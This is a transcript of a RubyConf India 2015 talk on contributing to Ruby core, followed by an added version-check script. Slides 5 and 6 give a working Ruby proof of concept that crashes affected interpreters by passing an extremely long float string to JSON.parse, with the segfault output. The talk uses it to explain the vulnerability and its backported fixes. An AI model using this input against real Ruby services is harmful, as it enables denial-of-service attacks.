
Ruby & You - RubyConf India 2015

hone
April 05, 2015

Transcript

  1. Whatever styling you define in your shadow DOM is not affected by any outside styling. Goodbye iframes.
  2. Top 5 Committers
     $ git shortlog -s --since=2012 | sort -rn | head -6
        2739  nobu   <---
         867  akr
         710  svn
         635  ko1
         596  naruse
         448  zzak
  3. Top 5 (Human) Committers
     $ git shortlog -s --since=2012 | sort -rn | head -6
        2739  nobu
         867  akr
         710  svn    <---
         635  ko1
         596  naruse
         448  zzak
  4. Top 5 (Human) Committers
     $ git shortlog -s --since=2012 | sort -rn | head -6
        2739  nobu
         867  akr
         710  svn
         635  ko1
         596  naruse
         448  zzak   <---
  5. Metasploit
     require 'json'   # needed for JSON.parse below

     # A short random run of digits that will be repeated.
     def digit_pattern
       @digit_pattern ||= rand(10_000).to_s
     end

     # How many times to repeat the pattern to reach roughly 500,000 digits.
     def multiplier
       (500_000 * (1.0 / digit_pattern.size)).to_i
     end

     # "<digits>.<digits repeated many times>": a float literal with a very long
     # fractional part, which is what triggers the crash on affected rubies.
     def evil_float_string
       [digit_pattern, digit_pattern * multiplier].join('.')
     end

     JSON.parse("[#{evil_float_string}]")
  6. $ ruby repro.rb
     [BUG] Segmentation fault
     ruby 2.0.0p247 (2013-06-27 revision 41674) [x86_64-linux]

     -- C level backtrace information ----------------------
     /../lib/libruby.so.2.0(+0x1ceaa8) [0x7f8787802aa8]
     /../rubies/ruby-2.0.0-p247/lib/libruby.so.2.0(+0x74e0a)
     /../lib/libruby.so.2.0(rb_bug+0xb3) [0x7f87876a9af3]
     /../lib/libruby.so.2.0(+0x14cf66) [0x7f8787780f66]
  7. Affected Versions
     • Ruby 1.8 after 1.8.6p230
     • Ruby 1.9 prior to 1.9.3p484
     • Ruby 2.0 prior to 2.0.0p353
     • Ruby 2.1 prior to 2.1.0 preview2
     • trunk prior to revision 43780
  8. Solution... All users are recommended to upgrade to
     • Ruby 1.9.3p484
     • Ruby 2.0.0p353
     • Ruby 2.1.0 preview2
  9. What about Ruby 1.8.7?
     Please note that the Ruby 1.8 series and any earlier releases are already obsoleted. There is no plan to release new FIXED versions for them.
  10. A Patch in Time
      Heroku releases two unofficial rubies:
      1. Ruby 1.9.2p321
      2. Ruby 1.8.7p375
      github.com/heroku/ruby
  11. To: [email protected], [email protected], [email protected], [email protected], [email protected]

      At Heroku, we’re still maintaining security fixes for customers on 1.8.7 and 1.9.2 while we figure out our end of life process. After discussion on the security list, I’d like to apply these patches to the proper branches upstream so things don’t get out of sync. Here are the commits I’d like to apply:
      https://github.com/ruby/ruby/pull/457
      https://github.com/ruby/ruby/pull/458

      -Terence
  12. Getting on Core
      • Send enough patches
      • Port Ruby to non-POSIX platforms
      • Write a library that is brought into stdlib
      • Security backporting
  13. Getting the Source (SVN)
      Trunk:
      $ svn co http://svn.ruby-lang.org/repos/ruby/trunk ruby
      Branch:
      $ svn co http://svn.ruby-lang.org/repos/ruby/branches/ruby_2_0_0
  14. Getting the Source (git-svn)
      $ git clone git://github.com/ruby/ruby.git
      $ cd ruby
      $ git svn init svn+ssh://[email protected] lang.org/ruby/trunk
      $ mv .git/refs/remotes/origin/trunk .git/refs/remotes/git-svn
      $ git svn rebase
  15. Top 5 (Human) Committers
      $ git shortlog -s --since=2012 | sort -rn | head -6
         2739  nobu
          867  akr
          710  svn    <---
          635  ko1
          596  naruse
          448  zzak
  16. Running Tests
      $ mkdir build
      $ autoconf
      $ cd build
      $ ./configure --prefix=~/tmp/xxx --enable-shared \
          --with-openssl-dir=/path/to/openssl \
          --with-readline-dir=/path/to/readline \
          --with-zlib-dir=/path/to/zlib
      $ make test-all TESTS=-v
  17. Creating a Patch
      $ diff -pu original/ changed/ > ruby-changes.patch
      $ svn diff > ruby-changes.patch
      $ git diff > ruby-changes.patch
  18. Filing Issues
      • Bugs are fixed on trunk first
      • Can request a backport once committed to trunk
      • bugs.ruby-lang.org/projects/ruby-trunk/issues/new
  19. Story: Insecure SSL Defaults
      • Ruby gets its defaults from OpenSSL
      • Whose responsibility is it?
  20. Ruby Core Developer Meetings
      • Draft an agenda
      • Pick a date (estimate)
      • Ask Matz
      • Ask ruby-core
  21. Moving to Git
      • Backport tools
      • Redmine
      • Version log
      • Others?
      • Convince Core
      • Profit…?
  22. Why Not Static Typing?
      • It works™ without it
      • It is against duck typing
      • It will be optional
  23. Why Not Static Typing?
      • It works™ without it
      • It is against duck typing
      • It will be optional
      • DRY
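As an added example (not from the deck or from Metasploit): a check that classifies a Ruby build against the "Affected Versions" and "Solution" slides (7 through 9), parsing the `ruby -v` style string shown in the segfault slide. The `float_parse_status` name, the result symbols and the sample version strings are assumptions made here.

```ruby
# Matches "ruby 2.0.0p247 (...)", "ruby 2.1.0preview1", "ruby 2.1.0dev", etc.
RUBY_DESC_RE = /\Aruby (\d+)\.(\d+)\.(\d+)(?:p(\d+)|(preview|rc)(\d+)|dev)?/

# Returns one of (names are our own, not the deck's):
#   :not_affected    - at or past the fixed release for its series
#   :affected        - vulnerable; upgrade to the release named in the slides
#   :affected_no_fix - 1.8 series after 1.8.6p230: vulnerable, no official fix planned
#   :unknown         - unparseable, or a dev/trunk build (depends on the revision)
def float_parse_status(description)
  m = RUBY_DESC_RE.match(description)
  return :unknown unless m
  major, minor, tiny = m[1].to_i, m[2].to_i, m[3].to_i
  patch = m[4] && m[4].to_i            # nil for preview/rc/dev builds
  pre   = m[5] && [m[5], m[6].to_i]    # e.g. ["preview", 2]

  case [major, minor]
  when [1, 8]
    # Affected after 1.8.6p230; the series is obsolete, so no fixed release.
    newer = tiny > 6 || (tiny == 6 && patch.to_i > 230)
    newer ? :affected_no_fix : :not_affected
  when [1, 9]
    # Fixed in 1.9.3p484 (so every 1.9.2 is affected).
    tiny > 3 || (tiny == 3 && patch.to_i >= 484) ? :not_affected : :affected
  when [2, 0]
    # Fixed in 2.0.0p353.
    tiny > 0 || patch.to_i >= 353 ? :not_affected : :affected
  when [2, 1]
    # Fixed in 2.1.0 preview2; any 2.1.0 release (pNNN) or later tiny is fine.
    return :not_affected if tiny > 0 || patch
    return :unknown unless pre         # "2.1.0dev": a trunk build, revision decides
    pre[0] == "rc" || pre[1] >= 2 ? :not_affected : :affected
  else
    # 2.2+ post-dates the fix; series before 1.8 are not listed on the slides.
    major > 2 || (major == 2 && minor > 1) ? :not_affected : :unknown
  end
end

# Stand-alone use: report on the interpreter running this script.
puts float_parse_status(RUBY_DESCRIPTION) if $PROGRAM_NAME == __FILE__
```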